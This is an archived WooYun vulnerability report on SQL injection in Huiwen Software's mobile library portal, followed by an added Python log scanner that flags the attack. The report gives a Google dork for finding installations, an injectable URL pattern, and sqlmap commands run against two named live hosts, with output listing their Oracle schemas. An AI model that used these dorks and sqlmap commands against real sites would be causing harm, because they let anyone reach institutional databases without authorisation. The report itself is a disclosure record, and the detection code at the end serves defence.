WooYun (WooYun.org) historical vulnerability archive---http://wy.zone.ci/
WooYun Drops articles online---http://drop.zone.ci/
2015-01-22: Details reported to the vendor, awaiting vendor handling
2015-01-27: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-03-23: Details disclosed to core white hats and experts in related fields
2015-04-02: Details disclosed to regular white hats
2015-04-12: Details disclosed to intern white hats
2015-04-02: Details disclosed to the public
SQL injection vulnerability in Huiwen Software's general-purpose mobile library handheld portal
The mobile library portal is a mobile service solution that combines a handheld web portal and a handheld app, bringing readers closer to the library in the era of mobile devices. Most domestic universities, government bodies and libraries use it, so there are many deployments of this mobile CMS. Google keyword: intitle:手机OPAC
Injection URL that works across deployments:
top_rating.action?clsNo=*
Two results from the Google dork, picked at random, for demonstration:
sqlmap -u "http://m.wxlib.cn/m/info/top_rating.action?clsNo=*" --dbs
[14:49:22] [INFO] fetching database (schema) names
[14:49:22] [INFO] the SQL query used returns 19 entries
[14:49:23] [INFO] retrieved: APEX_030200
[14:49:24] [INFO] retrieved: APPQOSSYS
[14:49:24] [INFO] retrieved: CTXSYS
[14:49:25] [INFO] retrieved: DBSNMP
[14:49:25] [INFO] retrieved: EXFSYS
[14:49:26] [INFO] retrieved: FLOWS_FILES
[14:49:27] [INFO] retrieved: LIBSYS
[14:49:27] [INFO] retrieved: MDSYS
[14:49:28] [INFO] retrieved: OLAPSYS
[14:49:28] [INFO] retrieved: ORDDATA
[14:49:29] [INFO] retrieved: ORDSYS
[14:49:29] [INFO] retrieved: OUTLN
[14:49:30] [INFO] retrieved: OWBSYS
[14:49:30] [INFO] retrieved: SCOTT
[14:49:30] [INFO] retrieved: SYS
[14:49:31] [INFO] retrieved: SYSMAN
[14:49:31] [INFO] retrieved: SYSTEM
[14:49:32] [INFO] retrieved: WMSYS
[14:49:32] [INFO] retrieved: XDB
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIBSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
sqlmap -u "http://202.200.151.19:8081/m/info/top_rating.action?clsNo=*" --dbs
[14:55:28] [INFO] fetching database (schema) names
[14:55:30] [INFO] the SQL query used returns 20 entries
[14:55:30] [INFO] retrieved: APEX_030200
[14:55:31] [INFO] retrieved: APPQOSSYS
[14:55:32] [INFO] retrieved: CTXSYS
[14:55:33] [INFO] retrieved: DBSNMP
[14:55:34] [INFO] retrieved: EXFSYS
[14:55:34] [INFO] retrieved: FLOWS_FILES
[14:55:36] [INFO] retrieved: LIBSYS
[14:55:40] [INFO] retrieved: LIBSYS1
[14:55:40] [INFO] retrieved: MDSYS
[14:55:41] [INFO] retrieved: OLAPSYS
[14:55:42] [INFO] retrieved: ORDDATA
[14:55:43] [INFO] retrieved: ORDSYS
[14:55:43] [INFO] retrieved: OUTLN
[14:55:44] [INFO] retrieved: OWBSYS
[14:55:45] [INFO] retrieved: SCOTT
[14:55:46] [INFO] retrieved: SYS
[14:55:46] [INFO] retrieved: SYSMAN
[14:55:47] [INFO] retrieved: SYSTEM
[14:55:48] [INFO] retrieved: WMSYS
[14:55:49] [INFO] retrieved: XDB
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIBSYS
[*] LIBSYS1
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
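A defender-side check for the endpoint named above, added here as an example that is not part of the original report or of Huiwen's software: it scans web-server access logs for requests to /m/info/top_rating.action whose clsNo value falls outside an allow-list of plausible classification codes, or that carry a scanner user-agent. The log lines and the assumed clsNo format (short alphanumeric code such as "TP3") are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Combined Log Format lines for illustration only (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2015:14:49:20 +0800] "GET /m/info/top_rating.action?clsNo=TP3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 4.4)"
10.0.0.9 - - [22/Jan/2015:14:49:22 +0800] "GET /m/info/top_rating.action?clsNo=* HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [22/Jan/2015:14:49:23 +0800] "GET /m/info/top_rating.action?clsNo=TP3%27 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.7 - - [22/Jan/2015:14:50:01 +0800] "GET /m/info/other.action?id=5 HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
ENDPOINT = "/m/info/top_rating.action"
# Assumption: a legitimate clsNo is a short classification code of letters, digits and dots.
CLSNO_OK = re.compile(r"^[A-Za-z0-9.]{1,10}$")


def inspect_request(line):
    """Return a finding dict for a suspicious request to the endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    if url.path != ENDPOINT:
        return None
    # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("clsNo", []):
        if not CLSNO_OK.match(value):
            reasons.append("clsNo fails allow-list: %r" % value)
    if "sqlmap" in m.group("ua").lower():
        reasons.append("scanner user-agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "status": m.group("status"), "reasons": reasons}


def scan_log(text):
    """Apply inspect_request to every line; return only the findings."""
    return [f for f in (inspect_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same allow-list is the right server-side validation for clsNo; combined with a bound parameter in the query it removes the injection the report demonstrates.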
Severity: No impact (vendor ignored)
Ignored at: 2015-04-02 10:23
None